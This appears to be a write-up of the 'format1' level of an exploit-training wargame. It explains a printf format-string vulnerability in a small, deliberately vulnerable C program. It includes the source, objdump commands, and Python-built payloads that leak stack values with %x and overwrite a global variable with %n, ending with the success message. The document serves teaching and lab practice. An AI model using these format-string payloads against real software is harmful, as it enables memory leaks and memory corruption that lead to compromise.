format1
This level shows how format strings can be used to modify arbitrary memory locations.
Hints: objdump -t is your friend, and your input string lies far up the stack :) (you can use objdump -t to find all symbols from the binary)
first of all, it's a memory leak vulnerability. you can leak all kinds of stuff from the stack. Imagin you had a program with ASLR, meaning that the location of the stack in memory is random. And you don't know where it is, but you need the address for a buffer overflow to jump to shellcode. with this here, you can leak values from the process memory, more specifically from the stack addresses.
$ ./format1 "%x %x %x %x"
804960c bffff6d8 8048469 b7fd8304
$ ./format1 "`python -c 'print("%x "*20)'`"
804960c bffff6a8 8048469 b7fd8304 b7fd7ff4 bffff6a8 8048435 bffff890 b7ff1040 804845b b7fd7ff4 8048450 0 bffff728 b7eadc76 2 bffff754 bffff760 b7fe1848 bffff710
source code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int target;
void vuln(char *string)
{
printf(string);
if(target) {
printf("you have modified the target :)\n");
}
}
int main(int argc, char **argv)
{
vuln(argv[1]);
}
get the address of target:
$ objdump -t ./format1 | grep target
08049638 g O .bss 00000004 target
$ ./format1 "`python -c 'print("AAAA" + "\x38\x96\x04\x08" + "BBBBBBBBB" + "%x "*137)'`"
AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff5b8 94293f61 be7bc971 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 b1000000 dffb6907 530f35e1 b99af379 699d7479 363836 0 2f2e0000 6d726f66 317461 41414141 8049638
$ ./format1 "`python -c 'print("AAAA" + "\x38\x96\x04\x08" + "BBBBBBBBB" + "%x "*136 + "%n ")'`"
AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff5b8 eb6e6312 c13c9502 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 b000000 71214f20 85368a42 13ebb60d 6998cac7 363836 0 2f2e0000 6d726f66 317461 41414141 you have modified the target :)
and pwned...